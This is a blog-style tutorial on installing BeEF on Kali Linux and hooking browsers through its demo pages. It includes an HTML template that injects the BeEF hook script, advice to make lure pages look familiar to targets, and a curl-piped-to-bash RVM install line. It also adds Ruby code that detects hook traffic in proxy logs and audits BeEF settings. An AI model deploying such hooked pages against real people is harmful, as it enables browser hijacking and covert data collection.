There are many tools for hacking and pen-testing in Kali Linux. One of the best of them is BeEF. Note that BeEF is not installed by default in Kali Linux, but you can find it in the default repository and install it with the apt package manager. You will then see a web interface open on port 3000 to run the tests. Read our article carefully. This article will teach you the best way to install BeEF on Kali Linux and show you all the installation steps.
BeEF is the short form of “Browser Exploitation Framework” and is an open-source penetration testing tool designed to assess the security of web browsers. This tool is something similar to Metasploit on Kali Linux but focuses on web browsers.
It is primarily used by ethical hackers and security professionals to evaluate the vulnerability of web applications and the security of client-side systems. BeEF allows testers to demonstrate various client-side attacks and assess how well a target system can withstand these attacks. This type of attack works great for social engineering.
Here, you will find out some key features of BeEF:
You can install BeEF manually on your Linux VPS, depending on the Kali Linux version you have. Installing BeEF is straightforward. Here, we will introduce you to the steps to install BeEF:
– The first step is updating the repositories info using the command below:
sudo apt update
Tip: If you were notified that upgrades are available, it is recommended to upgrade the system using the command below:
sudo apt upgrade
Now you can start installing BeEF with the following command:
sudo apt install beef-xss
All the dependencies required to use BeEF will be added automatically. This will bring up a web interface, but it needs many additional packages. So keep studying!
Once you have installed BeEF, you can start the related service with this command:
sudo beef-xss
Another option is to find BeEF in the main menu:
Now, you can use just one click to start or stop the service.
When you start the service, you can access the BeEF web interface at:
http://localhost:3000
Or, to access from another computer, use the following URL:
http://IP:3000
The login process will be like this:
– Your default user name is “beef” and your password is the one you set while starting the service.
– When you have passed all these steps successfully, you will have a web interface. But we will use the demo so that you get to know more about this tool.
BeEF uses demo pages to familiarize you with the working process of this tool, so it is better to pay attention to this section.
The first page of this tool is very simple. It is a text page with the BeEF logo:
Open the following URL in order to access it in your browser:
http://localhost:3000/demos/basic.html
When you open the page, you’ll see a new line under “Online Browsers” that corresponds to the tab you opened on the desktop.
All actions performed on this page are recorded, and you can see them in the user interface. Below is a screenshot of the tests as an example:
BeEF can detect whether the tab is in focus, what we have typed in the form, and where we have clicked with the mouse. All actions performed are internal, and no other code is needed to collect information.
BeEF can collect more general data about the user. These data can be:
This tool works in such a way that even if the target only opens the page for a second, its information, such as network, configuration, and the entire system, will be available to you.
After testing from Kali Linux, we will now test the BeEF tool from another computer:
The below screenshot shows that we accessed the page from a Windows computer, IP 192.168.***.**
Once the browser is connected to BeEF, you can use the commands available in this tab:
This way, you can control the web browser on the remote computer. In this example, we redirected the browser to a specific URL. You can use many other commands to collect data.
The important thing is to create better pages that look familiar to the intended target. For example, this page can be the entry page for their main program. If you want to create custom pages in BeEF, you should create HTML pages in this directory:
/usr/share/beef-xss/extensions
There you can see the demo folder we have used before with an HTML subfolder.
To connect this page to BeEF, just create a traditional HTML page and then add the following JavaScript code in the head:
<script>
  var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
  document.write(commandModuleStr);
</script>
We used the full code, as you can see here. If you like, you can copy and paste this code as a template for your new page:
<html>
<head>
  <title>Test page infosec</title>
  <!-- Writes a script tag that loads the hook from the BeEF server -->
  <script>
    var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
    document.write(commandModuleStr);
  </script>
</head>
<body>
</body>
</html>
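From the monitoring side, a browser that has loaded such a page keeps requesting the hook script from the BeEF server, which shows up in web proxy logs. The following is an added example, not code from this article or from the BeEF project: it flags clients that repeatedly fetch the hook, assuming BeEF's stock hook file name (/hook.js) and session name (BEEFHOOK), both of which can be changed in config.yaml. The log format and every log line are constructed.

```ruby
require 'uri'

HOOK_PATH    = '/hook.js'   # assumption: stock hook file name
HOOK_SESSION = 'BEEFHOOK'   # assumption: stock session parameter name

# Constructed proxy log lines: "<ISO time> <client ip> <method> <url>".
SAMPLE_LOG = <<~LOG
  2024-05-01T10:00:00Z 10.0.0.21 GET http://intranet.example/index.html
  2024-05-01T10:00:01Z 10.0.0.21 GET http://198.51.100.7:3000/hook.js
  2024-05-01T10:00:02Z 10.0.0.21 GET http://198.51.100.7:3000/hook.js?BEEFHOOK=CONSTRUCTEDSESSIONID
  2024-05-01T10:00:03Z 10.0.0.21 GET http://198.51.100.7:3000/hook.js?BEEFHOOK=CONSTRUCTEDSESSIONID
  2024-05-01T10:00:03Z 10.0.0.35 GET http://cdn.example/js/app.js
  2024-05-01T10:00:09Z 10.0.0.35 GET http://cdn.example/hooks.json
LOG

# Returns "host:port" when the URL looks like a hook request, otherwise nil.
def hook_server(url)
  uri = URI.parse(url)
  by_path  = uri.path == HOOK_PATH
  by_param = URI.decode_www_form(uri.query.to_s).any? { |key, _| key == HOOK_SESSION }
  (by_path || by_param) ? "#{uri.host}:#{uri.port}" : nil
rescue URI::InvalidURIError, ArgumentError
  nil # unparsable URL or malformed query string: not an indicator
end

# Counts hook requests per [client, server] pair and keeps the pairs that
# reach min_hits, since a hooked tab polls repeatedly rather than once.
def hooked_clients(log_text, min_hits: 2)
  hits = Hash.new(0)
  log_text.each_line do |line|
    _time, client, _method, url = line.split(' ', 4)
    next unless url
    server = hook_server(url.strip)
    hits[[client, server]] += 1 if server
  end
  hits.select { |_, count| count >= min_hits }
end

if __FILE__ == $PROGRAM_NAME
  hooked_clients(SAMPLE_LOG).each do |(client, server), count|
    puts "ALERT client=#{client} hook_server=#{server} requests=#{count}"
  end
end
```

Because the names are configurable, a clean result only rules out a server running with stock settings.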
At last, use this command if you want to stop this service:
sudo beef-xss-stop -h
Here are some common problems with BeEF on Kali Linux and their solutions:
1- Difficulty installing BeEF on Kali Linux due to missing dependencies or package conflicts.
Solution:
Ensure that your Kali Linux installation is up to date by running sudo apt update and sudo apt upgrade. Install any missing dependencies or packages as specified in the BeEF documentation or error messages.
2- BeEF may not work with the default Ruby version on Kali Linux.
Solution:
Use a Ruby version manager like RVM to install and manage the required Ruby version. BeEF typically works best with Ruby 2.5 or later. You can install RVM and the necessary Ruby version like this:
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
rvm install 2.7.4
rvm use 2.7.4 --default
3- Database-related errors or connection issues when starting BeEF.
Solution:
Ensure your PostgreSQL or MySQL server is running and properly configured. Update BeEF’s database configuration in the config.yaml file to match your database settings.
4- BeEF may fail to bind to the desired IP address or port.
Solution:
Edit the config.yaml file to specify the correct IP address and port for BeEF to bind to. Ensure that the IP address is reachable and not blocked by firewalls.
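Since the bind address, the login credentials and the web interface on port 3000 are all controlled from config.yaml, it is worth checking that file before the interface is reachable from other machines. The following is an added example, not part of BeEF or of this article: a small Ruby audit that assumes the key layout of BeEF's stock config.yaml (beef.credentials, beef.http.host, beef.restrictions.permitted_ui_subnet). The sample configuration and the weak-password list are constructed.

```ruby
require 'yaml'

# Constructed sample mirroring the layout of a stock BeEF config.yaml
# (assumption: key names as in the upstream file; values are made up).
SAMPLE_CONFIG = <<~YAML
  beef:
    credentials:
      user: "beef"
      passwd: "beef"
    restrictions:
      permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
    http:
      host: "0.0.0.0"
      port: "3000"
YAML

WEAK_PASSWORDS = %w[beef password admin changeme].freeze # constructed list
OPEN_SUBNETS   = ['0.0.0.0/0', '::/0'].freeze
WILDCARD_HOSTS = ['0.0.0.0', '::'].freeze

# Returns an array of finding symbols for a BeEF config given as YAML text.
def audit_beef_config(yaml_text)
  cfg  = YAML.safe_load(yaml_text) || {}
  beef = cfg['beef'] || {}
  findings = []

  # Default or guessable password on the admin interface.
  passwd = beef.dig('credentials', 'passwd').to_s
  findings << :weak_password if passwd.empty? || WEAK_PASSWORDS.include?(passwd.downcase)

  # Listening on every interface exposes port 3000 to the whole network.
  host = beef.dig('http', 'host').to_s
  findings << :binds_all_interfaces if WILDCARD_HOSTS.include?(host)

  # The admin UI should only be reachable from the tester's own subnet.
  ui_nets = Array(beef.dig('restrictions', 'permitted_ui_subnet'))
  findings << :ui_open_to_any_subnet if (ui_nets & OPEN_SUBNETS).any?

  findings
end

if __FILE__ == $PROGRAM_NAME
  findings = audit_beef_config(SAMPLE_CONFIG)
  puts findings.empty? ? 'OK: no findings' : findings.map { |f| "FINDING: #{f}" }
end
```

To check a real installation, pass the contents of your own config.yaml to audit_beef_config with File.read.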
BeEF is a penetration testing tool that allows you to control and interact with web browsers on remote systems, and can be useful for testing and demonstrating various web vulnerabilities. Here we tried to give you a complete guide to install BeEF on Kali Linux. So follow the steps to have a hassle-free installation process. Leave a comment if you encounter any problems. Happy coding!